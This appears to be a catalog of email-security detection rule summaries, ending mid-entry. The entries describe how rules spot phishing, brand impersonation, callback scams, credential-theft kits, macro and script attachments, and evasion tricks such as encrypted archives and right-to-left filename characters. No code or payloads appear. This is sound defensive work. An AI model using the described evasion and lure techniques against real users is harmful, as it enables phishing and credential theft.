Detects messages where the sender and recipient are the same address with a PDF attachment containing only 'VIEW PDF' text and a standardized body message requesting to view the attachment.

Read More

Impersonation of Dropbox, a file sharing service.

Read More

Detects messages impersonating TikTok through similar display names or logo detection, combined with security-themed content and authentication failures. Excludes legitimate TikTok communications and trusted senders.

Read More

Message contains use of the embluemail.com redirect. This has been exploited in the wild.

Read More

Detects messages where the link display text mimics a PDF filename containing the sender's domain name, combined with credential theft language or suspicious requests. The message is sent to an invalid recipient address or to the sender themselves, indicating potential abuse of email infrastructure.

Read More

Detects messages with 'Join with Google Meet' display text that redirects to domains other than meet.google.com.

Read More

Detects callback scams sent through legitimate Zoom infrastructure that impersonate well-known brands like McAfee, Norton, or PayPal. These messages contain purchase or support-related language along with phone numbers, attempting to trick recipients into calling fraudulent support lines.

Read More

A fraudulent invoice/receipt found in the body of the message sent by exploiting Paypal's invoicing service. Callback Phishing is an attempt by an attacker to solicit the victim (recipient) to call a phone number. The resulting interaction could lead to a multitude of attacks ranging from Financial theft, Remote Access Trojan (RAT) Installation or Ransomware Deployment.

Read More

Detects messages with QR code in attachments containing special characters in the path that include the recipient's email address in either the URL path or fragment, potentially encoded in base64. The URLs have a simple path structure and may end with suspicious patterns.

Read More

Detects messages containing the specific test string 'ANTHROPIC_MAGIC_STRING' in the plain text body content.

Read More

Impersonation of the expense management provider Navan.

Read More

Detects messages containing CMD (Command Prompt) batch files, either as direct attachments or within compressed archives. CMD files can execute arbitrary system commands and are commonly used to deliver malware or perform unauthorized system modifications.

Read More

Message with no subject line from a new sender where the reply-to address differs from the sender address, potentially indicating header manipulation or impersonation tactics.

Read More

Detects links containing a PHP redirect endpoint with authentication parameters, commonly used in malicious redirects and unauthorized access attempts.

Read More

Detects messages containing only URL shorteners with copy-paste instructions and high-confidence credential theft language, typically used to evade URL analysis by requiring manual URL entry.

Read More

Detects messages from senders impersonating Disney through display name spoofing or brand logo usage, combined with security-themed content and suspicious authentication patterns.

Read More

Detects links in the body of an email where the linked domain is less than 10 days old from untrusted senders.

Read More

Detects messages claiming to share files via SharePoint or OneDrive where the shared file name pattern matches the organizational naming pattern, indicating potential abuse of legitimate file sharing services to impersonate organizations.

Read More

Detects messages impersonating a Microsoft Teams invites by matching known invite text patterns while containing join links that do not resolve to Microsoft domains. Additional verification includes checking for absent phone dial-in options and missing standard Teams help text or HTML meeting components.

Read More

Detects legitimate Apple TestFlight emails that reference potentially suspicious developers or apps, including variations of OpenAI, ChatGPT, or Meta in the app description or developer name fields.

Read More

A fraudulent invoice/receipt found in the body of the message sent by exploiting Canva's design sharing feature.

Read More

Impersonation of Microsoft Planner, a component of the Microsoft 365 software suite.

Read More

Detects messages containing fax-related language and notification elements from senders outside of known legitimate fax service providers.

Read More

Detects credential phishing attempts using generic document sharing language where the sender claims to have sent a document for review, but the link doesn't point to legitimate file sharing services.

Read More

Attack impersonating a DocuSign request for signature.

Read More

Recon messages, a form of deliverability testing, are used to validate whether a recipient address is valid or not, potentially preceding an attack.

All recipients are bcc'd or undisclosed, with no links or attachments, and a short body and subject from an unknown sender.

Read More

Message contains a single link which attempts to spoof a 'zoom' link, sent from a free email provider to a single recipient.

Read More

Email contains a ClickFunnels (mass mailing platform) tracking link but does not originate from ClickFunnels sending infrastructure. The myclickfunnels.com domain has been abused by threat actors to attempt credential phishing.

Read More

Impersonation of Meta or Meta's subsidiaries Facebook and Instagram.

Read More

Detects messages with short body content or emoji containing PDF attachments from suspicious creators that include legal and compliance language with embedded malicious links, URL shorteners, or newly registered domains.

Read More

Detects compiled AppleScript files (.scpt) with document double-extensions (e.g., .docx.scpt, .pdf.scpt) commonly used in DPRK-attributed macOS malware campaigns. These files open in Script Editor when double-clicked and use social engineering (fake compatibility errors) to trick users into executing malicious reconnaissance scripts that fetch subsequent payload stages.

Read More

PDF attachment contains YARA signatures commonly associated with fraudulent W9 tax forms or invoice documents, which are frequently used in social engineering attacks to steal sensitive information or facilitate business email compromise.

Read More

Impersonation of Netflix.

Read More

Links in the message point to sensitive system directories like .git, .env, or .well-known that could expose confidential configuration data or system files. Actors will often abuse these directories to hide credential phishing landing pages of compromised sites.

Read More

Impersonation of the Microsoft brand.

Read More

Detects Gmail senders using display names with suspicious language patterns commonly associated with social engineering tactics, including urgency indicators, contact requests, and verification prompts.

Read More

Detects fraudulent Trello board invitations that impersonate organization VIPs by using organization domain names in board titles and including notes purportedly from legitimate company executives.

Read More

Detects messages impersonating Marriott brand that contain gift-related language such as 'appreciation gift', 'thank you gift', or 'something special' from senders not associated with legitimate Marriott domains.

Read More

Detects callback scams originating from legitimate WeTransfer noreply address using natural language processing to identify high-confidence callback scam intent in the message body.

Read More

Detects messages from free email providers where the sender's email address uses a pattern commonly associated with executive impersonation, containing 'chair' or 'ceo' followed by numbers in the local part.

Read More

Detects links containing the '?ai=xd' query parameter associated with 9wolf phishing service initial landing pages.

Read More

Detects messages containing links with special characters in the path that include the recipient's email address in either the URL path or fragment, potentially encoded in base64. The URLs have a simple path structure and may end with suspicious patterns.

Read More

Detects QR codes in attachments that contain the recipient's email address (either plaintext or base64 encoded) and redirect through suspicious URI structures commonly associated with Kratos/SneakyLog redirection services.

Read More

This rule detects emails attempting to impersonate a VIP requesting a W-2

Read More

Detects links containing URL fragments with repeating hexadecimal patterns, commonly used to obfuscate malicious destinations or bypass security filters.

Read More

Detects incoming messages containing ICS attachments with embedded SVG files that contain malicious JavaScript code, including base64-encoded content and potentially harmful event handlers. The rule specifically watches for onload events, location redirects, error handlers, and iframe elements with base64 data URIs.

Read More

Detects links to HTML files containing fragments with a suspicious pattern of alphanumeric characters followed by a 5-digit binary sequence, commonly used in malicious URL structures.

Read More

Detects links containing a 40-character hexadecimal subdomain with the recipient's email address base64 encoded in the URL fragment, a technique used to personalize malicious links and evade detection.

Read More

Detects Excel macro files created with the Go Excelize library containing document sharing language such as 'sent document', 'shared file', or 'REVIEW DOCUMENT'. These files are often used as lures to trick users into enabling macros or downloading malicious content.

Read More

Detects macro-enabled attachments containing document sharing language (sent, shared, forwarded) combined with browser interaction instructions (copy, right-click) or common email disclaimers. These tactics are often used to trick users into enabling macros or following malicious instructions.

Read More

Detects messages from domains containing both 'o365' and 'mail' in the second-level domain, commonly used to impersonate legitimate Microsoft Office 365 mail services.

Read More

Detects links containing base64-encoded parameters characteristic of the Mamba 2FA phishing kit, specifically looking for 'sv=o365' and '&uid=USER' patterns in redirect history.

Read More

Detects phishing attempts that impersonate corporate services such as HR, helpdesk, and benefits, using specific language in the subject or sender's name and containing suspicious links from low-reputation or mass-mailing domains.

Read More

Impersonation of the petroleum and natural gas company Saudi Aramco.

Read More

Detects messages containing two attachments where one is a PowerPoint file with suspicious character substitution in the filename ('Empl0yment' using zero instead of 'o') and body text claiming an employment contract has been updated.

Read More

Detects embedded Shell.Explorer.1 COM objects containing LNK files within various file types.

Read More

Detects messages impersonating hotel booking inquiries by identifying common hotel-related language patterns from senders where the reply-to is a free email provider and differs from the sender domain in an effort to validate whether a recipient address is valid or not, potentially preceding an attack.

Read More

Detects potential reconnaissance messages with very short, generic content like 'Hi' or 'Hello' from external senders. These messages are often used to validate email addresses and test deliverability before launching larger attacks.

Read More

Detects links containing the recipient's email address in the 'eta' query parameter, a technique commonly used to personalize malicious links and track targets.

Read More

Email body is suspicious, and links to a Microsoft Dynamics form. Known phishing tactic.

Read More

Detects callback scam solicitations originating from Monday.com's notification system using natural language understanding to identify fraudulent callback language in the message body.

Read More

Detects messages containing attachments or content that reference known fake identities used in FC Barcelona scams, including fake lawyer Michael Gerardus Hermanus Demon and sports agents with the surname Giuffrida. The rule examines EXIF metadata, OCR text from attachments, and message body content for these specific identity markers.

Read More

Detects incoming messages with a single ICS calendar file attachment that has a filename starting with 'meeting_'.

Read More

Detects messages claiming to be replies with In-Reply-To headers but lacking previous thread context, sent from addresses containing multiple wildcard characters in the local part.

Read More

Identifies the use of the Impact Solutions PhaaS.

Impact Vector Suite is a full-spectrum payload delivery platform, engineered for stealth-optimized execution across all major deployment vectors.

Read More

Detects messages with undisclosed or invalid recipients containing a single link to a personal SharePoint domain (with '-my' pattern) and high-confidence credential theft language in short message body.

Read More

Detects messages impersonating file sharing services that contain template artifacts such as placeholder comments, incomplete HTML elements, and development remnants. The message includes 'shared with you' language and exhibits multiple indicators of being generated from a malicious template including HTML comments with development terms, broken anchor tags, and filename elements that closely match the subject line.

Read More

Detects links utilizing the Tycoon2FA phishing kit, identified by specific DOM structure patterns and CDN characteristics, combined with suspicious domain indicators such as free subdomain hosts or suspicious TLDs. As the Tycoon2FA kit is evolving, this rule will not detect all variants of Tycoon2FA phishing, and is designed to compliment existing and future detections.

Read More

Detects messages from Adobe's legitimate email domain containing suspicious language about document or payment approval that may indicate service abuse.

Read More

Detects extortion and sextortion attempts by analyzing the email body text from an untrusted sender.

Read More

This rule detects messages attempting to initiate a Romance scam. The rule leverage tells such as undisclosed recipients, freemail emails in the body and common scam phrasing. Romance scams are deceptive schemes where scammers establish false romantic intentions towards individuals to gain their trust and eventually exploit them financially.

Read More

This rule detects a common credential phishing vector enticing the user to engage with links under the premise that they have a voicemail to retrieve. The rule looks for voicemail verbiage in the display name, body, subject or a combination of those elements with emojis or a medium to high credential theft NLU Intent from first-time + unsolicited sender.

Read More

Detects callback scam content sent from the legitimate Microsoft Power BI service email address, indicating potential service abuse to distribute fraudulent callback solicitations.

Read More

Detects callback scams by analyzing text within images of receipts or invoices from untrusted senders.

Read More

Detects calendar invites containing callback phishing language in the DESCRIPTION of the invite.

Read More

Detects messages impersonating AuthentiSign through display name, domain, subject, or body content that either originate from non-AuthentiSign or spoofed domains.

Read More

Detects PDF attachments that contain the recipient's domain in the filename and include a single link personalized with the recipient's email address, either in the URL directly, encoded in base64, or within a QR code.

Read More

Detects PDF attachments that are password protected and matching YARA signatures looking for specific content observed in previous activity.

Read More

Impersonation of Blockchain[.]com, usually for credential theft.

Read More

Detects messages containing two PDF attachments where one has invoice-related naming patterns and another contains W-9 tax form indicators, with at least one PDF generated by Chrome or wkhtmltopdf tools, commonly used in business email compromise attacks targeting financial processes.

Read More

Detects links where the display text contains a high concentration of Unicode right-to-left mark characters (U+200F), which may be used to obfuscate or manipulate the visual representation of the link text to deceive recipients.

Read More

Detects messages sent from a user to themselves containing a link with quarterly indicators (q1_, q2_, q3_, q4_) and specific document review language requesting urgent feedback.

Read More

Detects job scam content that includes specific weekly salary mentions (e.g., '$XXX weekly' patterns) in either the current email thread or previous thread conversations, while excluding legitimate income verification services.

Read More

Detects URLs with many (excessive) encoding patterns, including multiple instances of the same encoder or four or more distinct encoders. These techniques are commonly used to obfuscate malicious URLs and evade security filters.

Read More

Impersonation of the United States Postal Service.

Read More

Detects messages containing a single Breely link that displays as a PDF file. Typically, redirects to a different destination for malicious purposes.

Read More

Detects messages impersonating Xodo Sign with 'Processed by Xodo Sign' text from unauthorized senders that fail DMARC authentication.

Read More

Detects callback scam language in messages sent through legitimate GetAccept infrastructure, indicating potential abuse of the service for fraudulent solicitation.

Read More

Subject matches the display name of someone in your organization, and the body resembles a BEC attack.

Read More

RFQ/RFP scams involve fraudulent emails posing as legitimate requests for quotations or purchases, often sent by scammers impersonating reputable organizations. These scams aim to deceive recipients into providing sensitive information or conducting unauthorized transactions, often leading to financial loss, or data leakage.

Read More

Impersonation of the Quickbooks service from Intuit.

Read More

Detects commonly observed formatting of unauthorized giveaways, free tools, and products by multiple different brands.

Read More

Detects messages with subject lines containing bracketed patterns that follow a specific format with repeated characters, numeric sequences, and structured tracking identifiers commonly used in malicious automated messaging systems.

Read More

Detects inbound messages that impersonate Twilio/SendGrid through display name or domain manipulation, combined with security or authentication-themed content, while failing authentication checks and originating from untrusted sources.

Read More

Detects potential thread hijacking where the sender uses a domain similar to known senders, exhibits BEC behavior, and shows signs of compromised thread continuity through domain spoofing or thread manipulation.

Read More

Recursively scans files and archives to detect documents that ask the user to enable macros, including if that text appears within an embedded image.

Read More

Attachment from an unsolicited sender contains a macro that will auto-execute when the file is opened.

Macros are a common phishing technique used to deploy malware.

Read More

Recursively scans files and archives to detect embedded VBA files with an auto open exec.

Read More

Potentially malicious attachment containing a VBA macro. Oletools categorizes the macro risk as 'high'.

Read More

Recursively scans files and archives to detect embedded VBA files with an encoded hex string referencing an exe.

This may be an attempt to heavily obfuscate an execution through Microsoft document.

Read More

Attachment contains a VBA macro from a sender your organization has never sent an email to.

Sender is using a display name that matches the display name of someone in your organization.

VBA macros are a common phishing technique used to deploy malware.

Read More

Attached .csproj file contains suspicious commands.

Read More

Detects 7z archive attachments that contain RAR files, which may be used to evade detection by nesting compressed file formats.

Read More

Recursively scans archives to detect HTML files from unsolicited senders.

HTML files can be used for HTML smuggling and embedded in archives to evade detection.

Read More

Recursively scans archives to detect disallowed file types. File extensions can be detected within password-protected archives.

Attackers often embed malicious files within archives to bypass email gateway controls.

Read More

Detects a known Qakbot delivery method, zip file with pdf, txt and wsf file at a depth of 1

Read More

Detects calendar (.ics) attachments containing suspicious invisible Unicode characters, which may be used to hide malicious content or bypass security filters. The rule triggers on messages with calendar-related keywords in the subject or body.

Read More

A fraudulent invoice/receipt found in an image attachment. Callback Phishing is an attempt by an attacker to solicit the victim (recipient) to call a phone number. The resulting interaction could lead to a multitude of attacks ranging from Financial theft, Remote Access Trojan (RAT) Installation or Ransomware Deployment.

Read More

Attachment contains an external relationship that attempts to load a remote OLE object, consistent with use in CVE-2021-40444.

On September 7, 2021, Microsoft released details about a zero day RCE vulnerability in MSHTML that affects Microsoft Windows.

According to Microsoft: "we are aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents. An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine."

Read More

Attachment contains an RTF file with a font table defining an excessive number of fonts, used to exploit CVE-2023-21716.

Read More

This rule detects PDF files containing a DocuSign logo linking to a newly created domain (Less than or equal to 3 days)

Read More

Javascript inside SVG files can be used to smuggle malicious payloads or execute scripts.

Read More

MHT files can be used to run VBScript, which can run malicious code.

Read More

Attached EML contains a base64 encoded script in the message body.

Read More

Attached EML file contains an HTML attachment with suspicious login indicators. Known credential theft technique.

Read More

Detects when an EML file is attached that contains an encrypted ZIP file. The encryption can be used to bypass security scanning and deliver malicious content.

Read More

Attached EML contains suspicious indicators, such as a missing sender email or short HTML body.

Read More

Encrypted OLE2 (eg Microsoft Office) attachment from an unsolicited sender. Attachment encryption is a common technique used to bypass malware scanning products. Use if receiving encrypted attachments is not normal behavior in your environment.

Read More

Detects Excel attachments containing a specific template identifier (TM16390866) in the EXIF metadata, which may indicate malicious or suspicious document templates being used to distribute harmful content.

Read More

Body contains language resembling credential theft, and an attached "secure message" from an untrusted sender.

Read More

Javascript contains identifiers or strings that may attempt to execute files.

Read More

Recursively identifies attachments that attempt to conceal their true file extension by using right-to-left override characters

Read More

Recursively scans files and archives to detect indicators of login portals implemented in HTML files. This is a known credential theft technique used by threat actors.

Read More

Attached HTML file does not contain any HTML other than a